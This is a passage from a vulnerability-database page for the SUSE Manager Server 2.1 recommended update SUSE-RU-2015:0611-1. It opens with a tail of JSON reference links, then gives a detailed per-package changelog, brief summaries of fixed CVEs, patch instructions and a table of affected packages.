1108\"},{\"url\":\"https://lists.apache.org/thread.html/4c3fd707a049bfe0577dba8fc9c4868ffcdabe68ad86586a0a49242e%40%3Cissues.commons.apache.org%3E\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3Cdev.drill.apache.org%3E\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://lists.apache.org/thread.html/65b39fa6d700e511927e5668a4038127432178a210aff81500eb36e5%40%3Cissues.commons.apache.org%3E\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://lists.apache.org/thread.html/66176fa3caeca77058d9f5b0316419a43b4c3fa2b572e05b87132226%40%3Cissues.commons.apache.org%3E\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://lists.apache.org/thread.html/6afe2f935493e69a332b9c5a4f23cafe95c15ede1591a492cf612293%40%3Cissues.commons.apache.org%3E\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://lists.apache.org/thread.html/6b30629b32d020c40d537f00b004d281c37528d471de15ca8aec2cd4%40%3Cissues.commons.apache.org%3E\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://lists.apache.org/thread.html/708d94141126eac03011144a971a6411fcac16d9c248d1d535a39451%40%3Csolr-user.lucene.apache.org%3E\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://lists.apache.org/thread.html/869c08899f34c1a70c9fb42f92ac0d043c98781317e0c19d7ba3f5e3%40%3Cissues.commons.apache.org%3E\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://lists.apache.org/thread.html/88c497eead24ed517a2bb3159d3dc48725c215e97fe7a98b2cf3ea25%40%3Cdev.commons.apache.org%3E\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://lists.apache.org/thread.html/8e2bdfabd5b14836aa3cf900aa0a62ff9f4e22a518bb4e553ebcf55f%40%3Cissues.commons.apache.org%3E\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://lists.apache.org/thread.html/918ec15a80fc766ff46c5d769cb8efc88fed6674faadd61a7105166b%40%3Cannounce.apache.org%3E\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe%40%3Ccommits.druid.apache.org%3E\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://lists.apache.org/thread.html/956995acee0d8bc046f1df0a55b7fbeb65dd2f82864e5de1078bacb0%40%3Cissues.commons.apache.org%3E\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://lists.apache.org/thread.html/97fc033dad4233a5d82fcb75521eabdd23dd99ef32eb96f407f96a1a%40%3Cissues.commons.apache.org%3E\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://lists.apache.org/thread.html/9b5505632f5683ee17bda4f7878525e672226c7807d57709283ffa64%40%3Cissues.commons.apache.org%3E\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://lists.apache.org/thread.html/aa4ca069c7aea5b1d7329bc21576c44a39bcc4eb7bb2760c4b16f2f6%40%3Cissues.commons.apache.org%3E\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3Cdev.drill.apache.org%3E\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://lists.apache.org/thread.html/c24c0b931632a397142882ba248b7bd440027960f22845c6f664c639%40%3Ccommits.commons.apache.org%3E\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://lists.apache.org/thread.html/c70da3cb6e3f03e0ad8013e38b6959419d866c4a7c80fdd34b73f25c%40%3Ccommits.pulsar.apache.org%3E\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://lists.apache.org/thread.html/c7e31c3c90b292e0bafccc4e1b19c9afc1503a65d82cb7833dfd7478%40%3Cissues.commons.apache.org%3E\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://lists.apache.org/thread.html/cee6b1c4533be1a753614f6a7d7c533c42091e7cafd7053b8f62792a%40%3Cissues.commons.apache.org%3E\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://lists.apache.org/thread.html/d27c51b3c933f885460aa6d3004eb228916615caaaddbb8e8bfeeb40%40%3Cgitbox.activemq.apache.org%3E\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://lists.apache.org/thread.html/df093c662b5e49fe9e38ef91f78ffab09d0839dea7df69a747dffa86%40%3Cdev.commons.apache.org%3E\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://lists.apache.org/thread.html/df1c385f2112edffeff57a6b21d12e8d24031a9f578cb8ba22a947a8%40%3Cissues.commons.apache.org%3E\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://lists.apache.org/thread.html/ebc4f019798f6ce2a39f3e0c26a9068563a9ba092cdf3ece398d4e2f%40%3Cnotifications.commons.apache.org%3E\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://lists.apache.org/thread.html/f3682772e62926b5c009eed63c62767021be6da0bb7427610751809f%40%3Cissues.commons.apache.org%3E\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3Cissues.drill.apache.org%3E\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://lists.apache.org/thread.html/fda473f46e51019a78ab217a7a3a3d48dafd90846e75bd5536ef72f3%40%3Cnotifications.commons.apache.org%3E\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://lists.apache.org/thread.html/ffde3f266d3bde190b54c9202169e7918a92de7e7e0337d792dc7263%40%3Cissues.commons.apache.org%3E\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://lists.apache.org/thread.html/r204ba2a9ea750f38d789d2bb429cc0925ad6133deea7cbc3001d96b5%40%3Csolr-user.lucene.apache.org%3E\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://lists.apache.org/thread.html/r458d61eaeadecaad04382ebe583230bc027f48d9e85e4731bc573477%40%3Ccommits.dolphinscheduler.apache.org%3E\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://lists.apache.org/thread.html/r75d67108e557bb5d4c4318435067714a0180de525314b7e8dab9d04e%40%3Cissues.activemq.apache.org%3E\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://lists.apache.org/thread.html/rf5230a049d989dbfdd404b4320a265dceeeba459a4d04ec21873bd55%40%3Csolr-user.lucene.apache.org%3E\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://security.gentoo.org/glsa/201607-09\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://security.netapp.com/advisory/ntap-20140911-0001/\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://security.netapp.com/advisory/ntap-20180629-0006/\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"}]}}"
}
}
SUSE-RU-2015:0611-1
Vulnerability from csaf_suse - Published: 2015-02-25 20:05 - Updated: 2015-02-25 20:05Summary
Recommended update for SUSE Manager Server 2.1
Severity
Moderate
Notes
Title of the patch: Recommended update for SUSE Manager Server 2.1
Description of the patch:
This collective update for SUSE Manager Server 2.1 provides the following
new features:
* Connect SUSE Manager to the SUSE Customer Center.
* Manage SLE12 systems.
* ISS: export/import information about cloned channels to support
Service Pack migration on ISS slaves. (FATE#317789)
* New API calls: system.scheduleSPMigration(),
system.scheduleDistUpgrade(). (FATE#314785, FATE#314340)
Additionally, several issues have been fixed:
auditlog-keeper:
* Fix value too long for type character varying(2048). (bnc#872351)
* Fix init.d script restart. (bsc#872029)
cobbler:
* Require syslinux-x86_64 on s390x. (bsc#884051)
* Fix fetching of profiles for auto-installation. (bsc#880936)
* Fix port guessing in koan. (bsc#855389)
* Add 'copy-default' option to grubby-compat. (bsc#855389)
* Handle elilo in SUSE. (bsc#855389)
* Fix wrong option 'text' in SUSE environment. (bsc#901058)
* Fix re-installation on SLE with static network configuration.
(bsc#883487)
* Add RHEL 7 as a valid operating system version.
oracle-config:
* No need to pre-require Apache as its user and group are available in
the base system.
osad:
* Enable and install osad during first installation. (bsc#901958)
pxe-default-image:
* Add bind-utils (dig) to packagelist. (bsc#889739)
* Wait for gateway to become available before register. (bsc#895001)
rhnlib:
* Ensure bytes strings are sent to pyOpenSSL. (bnc#880388)
rhnpush:
* Add default path structure to proxy lookaside that avoids collisions.
sm-ncc-sync-data:
* Add SUSE Cloud 4 channels. (bnc#883057)
* Add channels for SUSE Manager Server 2.1 s390x.
* Fix parent label of the LTSS channel for SLMS.
* Add ATI and nVidia channels for SLED11-SP3. (bsc#901108)
* Add support for RES7 in SUSE Manager. (bsc#897723, bsc#893608)
smdba:
* Fix 'system check breaks backup and other configuration'.
* Implement rotating PostgreSQL backup. (bsc#896244)
* Space reclamation caused ORA-00942: table or view does not exist.
(bsc#906850)
* Archival of PosgreSQL transaction log does not recover in case of no
space left on device. (bsc#915140)
spacecmd:
* Fix listupgrades. (bsc#892707)
* Make print_result a static method of SpacewalkShell. (bsc#889605)
* Call listAutoinstallableChannels() for listing distributions.
(bsc#887879)
* Fix spacecmd schedule listing. (bsc#902494)
* Fix call of setCustomOptions() during kickstart_importjson.
(bsc#879904)
* Fix configchannel export: do not create 'contents' key for
directories. (bsc#908849)
spacewalk-backend:
* Insert update tag at the correct place for SLE12. (bsc#907677)
* Trigger generation of metadata if the repo contains no packages.
(bsc#870159)
* Convert mtime to localtime to prevent invalid times because of DST.
(bsc#914437)
* Do not exit with error if a vendor channel has no URL associated.
(bsc#914260)
* Convert empty string to null for DMI values. (bsc#911272)
spacewalk-branding:
* CVE patches adapted for colour blind users. (bnc#872298)
* Underline in icons is removed. (bnc#880001)
* Fix link to macro documentation. (bsc#895961)
* Fix branding in error message. (bsc#902503)
spacewalk-certs-tools:
* Fix removal of existing host key entries. (bsc#886391)
* Remove duplicates from authorized_keys2 as well. (bsc#885889)
* Do not allow registering a SUSE Manager server against itself.
(bsc#841731)
spacewalk-client-tools:
* Allow unicode characters in proxy username and password.
* Send correct hostname. (bsc#887538)
spacewalk-config:
* Add recommended Apache settings from the Security Team.
spacewalk-java:
* Fix human dates now() staying unmodified. (bnc#880081)
* Allow for null evr and archs on event history detail. (bnc#880327)
* Disable form autocompletion in some places. (bnc#879998)
* Fix datepicker time at xx:xx PM pre-filled with xx:xx AM.
(bnc#881522)
* Fixed package upgrade via SSM when using the Oracle DB as backend.
(bnc#889721)
* This update fixes various cross-site scripting (XSS) issues in
spacewalk-java. (CVE-2014-3654, bnc#902182)
* Sync correct repositories. (bnc#904959)
* Fix pxt page link to point to the ported version of that page.
(bsc#903720)
* Correctly apply patches to multiple systems in SSM. (bsc#898242)
* Fix CVE audit when some packages of a patch are already installed.
(bsc#899266)
* Download CSV button does not export all columns ('Base Channel'
missing). (bsc#896238)
* Read and display only a limited number of logfile lines. (bsc#883009)
* Fix package upgrade via SSM. (bsc#889721)
* Fix logrotate for /var/log/rhn/rhn_web_api.log. (bsc#884081)
* Throw channel name exception if name is already used. (bnc#901675)
* Don't commit when XMLRPCExceptions are thrown. (bsc#908320)
* Remove 'Select All' button from system currency report. (bsc#653265)
* Fix documentation search. (bsc#875452)
* Add API listAutoinstallableChannels(). (bsc#887879)
* Avoid ArrayIndexOutOfBoundsException with invalid URLs. (bsc#892711)
* Avoid NumberFormatException in case of invalid URL. (bsc#892711)
* Lookup kickstart tree only when org is found. (bsc#892711)
* Fix NPE on GET /rhn/common/DownloadFile.do. (bsc#892711)
* Port of the advanced provisioning option page to bootstrap.
(bnc#862408)
* mgr-sync refresh sets wrong permissions on JSON files. (bnc#907337)
* Fix link to macro documentation. (bsc#895961)
* Forward to 'raw mode' page in case this is an uploaded profile.
(bsc#904841)
* Enlarge big text area to use more available screen space.
(bnc#867836)
* Fix links to monitoring documentation. (bsc#906887)
* Fix install type detection. (bsc#875231)
* Point 'Register Clients' link to 'Client Configuration Guide'.
(bsc#880026)
* Change order of installer type: prefer SUSE Linux. (bsc#860299)
* Fix ISE when clicking system currency. (bnc#905530)
* Set cobbler hostname variable when calling system.createSystemRecord.
(bnc#904699)
* Fix wrong install=http://nullnull line when calling
system.createSystemRecord. (bnc#904699)
* Explain snapshot/rollback behavior better. (bsc#808947)
* Fix patch syncing: prevent hibernate.NonUniqueObjectException
androllback. (bsc#903880)
* Remove 'Add Selected to SSM' from system overview page. (bsc#901776)
* Fix CVE audit in case of multi-version package installed and patch in
multi channels. (bsc#903723)
* Update channel family membership when channel is updated.
(bsc#901193)
* Add log warning if uploaded file size > 1MB. (bnc#901927)
* Fix channel package compare. (bsc#904690)
* Fix automatic configuration file deployment via snippet. (bsc#898426)
* Add client hostname or IP to log messages. (bsc#904732)
* Fixed copying text from kickstart snippets. (bsc#880087)
* Fix auditlog config yaml syntax. (bsc#913221)
* Show Proxy tab if system is a proxy even when assigned to cloned
channels. (bsc#913939)
* Fixed uncaught error which prevent correct error handling.
(bsc#858971)
* Fix NPE by setting max_members to 0 instead of NULL. (bsc#912035)
* Fix more cross-site-scripting (XSS) issues. (CVE-2014-7811,
bsc#902915)
* Fix basic authentication for HTTP proxies. (bsc#912057)
* Accept repos with same SCC ID and different URLs. (bsc#911808)
* Avoid mgr-sync-refresh failure because clear_log_id was not called.
(bsc#911166)
* Fix cross-site-scripting (XSS) issue in system-group (CVE-2014-7812,
bsc#912886)
* Fix 'Select All' buttons display on rhn:list and make it consistent
with new rl:list. (bsc#909724)
* Fix List tag missing submit parameter for 'Select All' and others.
(bnc#909724)
* Sort filelist in configfile.compare event history alphabetically.
(bsc#910243)
* Allow parenthesis in system group description. (bsc#903064)
* Provide new API documentation in PDF format. (bsc#896029)
* Update the example scripts section. (bsc#896029)
* Fixed wording issues on package lock page. (bsc#880022)
* Make text more clear for package profile sync. (bsc#884350)
spacewalk-reports:
* Added channel- and server-group-ids to activation-keys.
* Added spacewalk-report for systems with extra packages.
spacewalk-search:
* Fix package searching in shared channels.
spacewalk-setup:
* Setup /etc/sudoers in SUSE Manager upgrade scripts (bnc#881711)
* No activation if database population should be skipped. (bsc#900956)
* Do not enable spacewalk-service in runlevel 4. (bsc#879992)
spacewalk-utils:
* Fixed spacewalk-hostname-rename to work with PostgreSQL backend.
* Added limitation of spacewalk-clone-by-date for RHEL4 and earlier.
* Add openSUSE 13.2 repositories to spacewalk-common-channels.
* Improve clone-by-date dependency resolution.
* Add CentOS 7 and EPEL 7 channels.
* Fix error if blacklist / removelist is not in scbd configurationfile.
spacewalk-web:
* Fix links to monitoring documentation. (bsc#906887)
* Show Proxy tab if system is a proxy even when assigned to cloned
channels. (bsc#913939)
supportutils-plugin-susemanager:
* Write current service and repository configuration into
supportconfig.
susemanager-manuals_en, susemanager-jsp_en:
* Clarification about supported Web browsers. (bsc#889905)
* Update text and image files. (bnc#907527)
* Document NCC to SCC switch with SUSE Manager 2.1. (bnc#907106,
bnc#907643, bnc#907645, bnc#907646)
* SUSE Manager server update description. (bnc#902373)
* Activation keys and packages. (bnc#767279)
* Cobbler (bnc#880027), Link fix (bnc#881225), Wagon (bnc#884366)
* Install and ship the built PDFs. (bnc#907086)
* Update text and image files (bsc#910494).
* Firewall rules are incomplete - ssh-push and ssh-push-tunnel settings
missing. (bsc#904703)
* Document SP migration and ISS. (bsc#913215, partially).
* Fix 'beta packages' mentioned in documentation. (bsc#886421).
* User guide: Snapshots: clarify snaphot usage. (bsc#906851).
* Document maximal supported configuration file limit. (bsc#910482).
susemanager-schema:
* Add SLE 12 distribution targets to database.
* Fix evr_t schema upgrade. (bsc#881111)
* Allow evr_t to be compared with NULL in Oracle. (bsc#881111)
* Add support to ppc64le architecture.
* Fix migration script names to fix bare-metal registration.
(bsc#896109)
* Create regular index instead and have one migration per DB.
(bsc#905072)
* Drop unique index on package ids. (bsc#905072)
* Fix NPE by setting max_members to 0 instead of NULL. (bsc#912035)
* Fix old migration for future reference. (bsc#911180)
* Avoid NPE when migrating to SCC on Oracle migrated from 1.7.
(bsc#911180)
susemanager:
* Update the sudoers file after SUSE Manager upgrade. (bnc#881711)
* Fix oracle2postgres.sh (database configuration).
* Replace /etc/motd after setup. (bsc#883379)
* Make mgr-create-bootstrap-repo SCC and SLE 12 aware.
* Abort setup when invalid SSL country code given. (bnc#882468)
* Use noRepoSync parameter always.
* Fixed error message on exception in mgr-sync. (bnc#905263)
* Fixed add product to not trigger redundant addition of base channel.
(bnc#901928)
* Ask for the authentication beforehand. (bsc#908317)
susemanager-sync-data:
* Add channels for Public Cloud Module. (bsc#907586)
* Add new channel families SLE-WE and SLE-LP.
* Add ATI and nVidia channels for SLED11-SP3. (bsc#901108)
* Add channels for IBM-DLPAR for SLE12 ppc64le.
* Added support for RES7 in SUSE Manager. (bsc#897723, bsc#893608)
suseRegisterInfo:
* Re-add legacy suse_register_info to successfully perform the update.
(bsc#898428)
zypp-plugin-spacewalk:
* Check for retrieveOnly option in up2date configuration and set
download_only. (bsc#896254)
* Changed the spec file to force usage of the official python VM.
(bsc#889363)
yum:
* Preserve query parameters in URLs. (bsc#896844)
struts:
* CVE-2014-0114: The ActionForm object in Apache Struts 1.x through
1.3.10 allows remote attackers to 'manipulate' the ClassLoader and
execute arbitrary code via the class parameter, which is passed to
the getClass method.
apache2-mod_wsgi:
* CVE-2014-0242: Information exposure. (bnc#878553)
* CVE-2014-0240: Local privilege escalation. (bnc#878550)
* CVE-2014-8583: Failure to handle errors when attempting to drop group
privileges. (bnc#903961)
libyaml-0-2:
* Assert failure when processing wrapped strings (bnc#907809,
CVE-2014-9130)
tanukiwrapper:
* Allow more than 4G as -Xmx option. (bsc#914900)
The following new packages have been added to the product:
susemanager-sync-data, google-gson, python-enum34.
How to apply this update:
1. Log in as root user to the SUSE Manager server.
2. Stop the Spacewalk service: spacewalk-service stop
3. Apply the patch using either zypper patch or YaST Online Update.
4. Upgrade the database schema with spacewalk-schema-upgrade
5. Start the Spacewalk service: spacewalk-service start
Security Issues:
* CVE-2014-0114
<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0114>
* CVE-2014-0240
<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0240>
* CVE-2014-0242
<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0242>
* CVE-2014-3654
<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3654>
* CVE-2014-7811
<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7811>
* CVE-2014-7812
<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7812>
* CVE-2014-8583
<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8583>
* CVE-2014-9130
<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9130>
Patchnames: sleman21-suse-manager-201503
Terms of use: CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
Affected products
Recommended
89 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Manager 2.1:apache2-mod_wsgi-3.3-5.7.17.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:auditlog-keeper-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:auditlog-keeper-rdbms-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:auditlog-keeper-spacewalk-validator-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:auditlog-keeper-syslog-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:auditlog-keeper-xmlout-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:cobbler-2.2.2-0.54.9.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:google-gson-2.2.4-0.7.52.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:libyaml-0-2-0.1.3-0.10.16.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:oracle-config-1.1-0.10.10.16.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:osa-dispatcher-5.11.33.7-0.7.16.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:perl-Class-Singleton-1.4-4.13.38.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:perl-NOCpulse-Object-1.26.13.2-0.7.13.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:perl-Satcon-1.20.2-0.7.6.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:perl-auditlog-keeper-client-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:postgresql91-pltcl-9.1.15-0.3.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:pxe-default-image-0.1-0.20.56.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:python-enum34-1.0-0.7.33.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:python-gzipstream-1.10.2.2-0.7.6.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:rhn-custom-info-5.4.22.6-0.7.13.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:rhnlib-2.5.69.6-0.7.6.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:rhnmd-5.3.18.4-0.7.15.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:rhnpush-5.5.71.7-0.7.16.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:sm-ncc-sync-data-2.1.9-0.7.6.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:smdba-1.5.1-0.7.6.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacecmd-2.1.25.7-0.7.9.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-admin-2.1.2.4-0.7.6.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-app-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-applet-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-config-files-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-config-files-common-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-config-files-tool-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-iss-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-iss-export-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-libs-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-package-push-server-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-server-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-sql-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-sql-oracle-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-sql-postgresql-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-tools-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-xml-export-libs-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-xmlrpc-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-base-2.1.60.12-0.7.7.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-base-minimal-2.1.60.12-0.7.7.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-base-minimal-config-2.1.60.12-0.7.7.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-branding-2.1.33.10-0.7.16.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-certs-tools-2.1.6.5-0.7.10.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-check-2.1.16.6-0.7.9.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-client-setup-2.1.16.6-0.7.9.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-client-tools-2.1.16.6-0.7.9.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-config-2.1.5.4-0.7.15.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-doc-indexes-2.1.2.3-0.7.26.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-grail-2.1.60.12-0.7.7.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-html-2.1.60.12-0.7.7.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-java-2.1.165.14-0.7.16.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-java-config-2.1.165.14-0.7.16.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-java-lib-2.1.165.14-0.7.16.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-java-oracle-2.1.165.14-0.7.16.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-java-postgresql-2.1.165.14-0.7.16.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-pxt-2.1.60.12-0.7.7.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-reports-2.1.14.8-0.7.10.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-search-2.1.14.6-0.7.18.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-setup-2.1.14.9-0.7.6.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-setup-jabberd-2.1.0.2-0.7.6.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-sniglets-2.1.60.12-0.7.7.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-taskomatic-2.1.165.14-0.7.16.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-utils-2.1.27.12-0.7.25.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalksd-5.0.14.6-0.7.15.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:struts-1.2.9-162.33.22.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:supportutils-plugin-susemanager-1.0.3-0.5.5.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:supportutils-plugin-susemanager-client-1.0.4-0.5.5.noarch | — |
Vendor Fix
